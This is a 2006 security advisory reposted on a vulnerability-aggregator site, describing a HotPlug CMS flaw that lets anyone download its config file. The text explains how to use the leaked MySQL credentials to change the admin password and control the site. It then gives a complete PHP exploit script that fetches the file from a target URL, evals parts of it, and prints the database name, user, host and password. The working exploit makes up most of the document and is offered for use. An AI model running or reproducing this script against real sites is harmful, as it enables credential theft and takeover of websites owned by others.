Security Advisory: HotPlug CMS Config File Include Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit
  Popper <= v1.41 (form) Remote File Inclusion Exploit
  [SA21826] Stefan E. Newsscript Multiple Vulnerabilities
  OPENi-CMS 1.0.
1(config) Remote File Inclusion Vulnerability

From: HACKERS PAL <security_(at)_soqor.net>
Date: 12.09.2006
Subject: HotPlug CMS Config File Include Vulnerability

Hello

HotPlug CMS Config File Include Vulnerability

Discovered by : HACKERS PAL
Copyrights : HACKERS PAL
Website : WwW.SoQoR.NeT
Email : security@soqor.net

After Script Url Add
includes/class/config.inc

And you will download the config file ,, so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the website..

And This is the exploit if you want :-

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* HotPlug CMS Config File Include Vulnerability exploit
/*                 By : HACKERS PAL
/*                   WwW.SoQoR.NeT
*/
print_r('
/**********************************************/
/*   HotPlug CMS Config File Include Vul      */
/*   by HACKERS PAL <security@soqor.net>      */
/*       site: http://www.soqor.net           */');
if ($argc<2) {
print_r('
/* --                                         */
/* Usage: php '.$argv[0].' host             */
/* Example:                                   */
/* php '.$argv[0].' http://localhost/hot    */
/**********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit="/includes/class/config.inc";
$page=$url.$exploit;
        Function get_page($url)
        {

                 if(function_exists("file_get_contents"))

                 {

                      $contents = file_get_contents($url);

                         }
                         else
                         {
                             $fp=fopen("$url","r");
                             while($line=fread($fp,1024))
                             {
                              $contents=$contents.$line;
                             }

                                 }
                      return $contents;
        }

    $page = get_page($page);

    if(eregi("<?php",$page))
    {
       $lines = explode("\n",$page);

       $evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines[56].
$lines[58].$lines[58].$lines[59];
       $evaled=str_replace("include","#include",
$evaled);
       eval($evaled);

       Echo "\n[+] Database Name : $db_name";
       Echo "\n[+] Database User : $db_user";
       Echo "\n[+] Database Host : $db_host";
       Echo "\n[+] Database Pass : $db_password";
                                Die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/")
;
            }
            else
            {
               Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/")
;

               }
?>

WwW.SoQoR.NeT

test server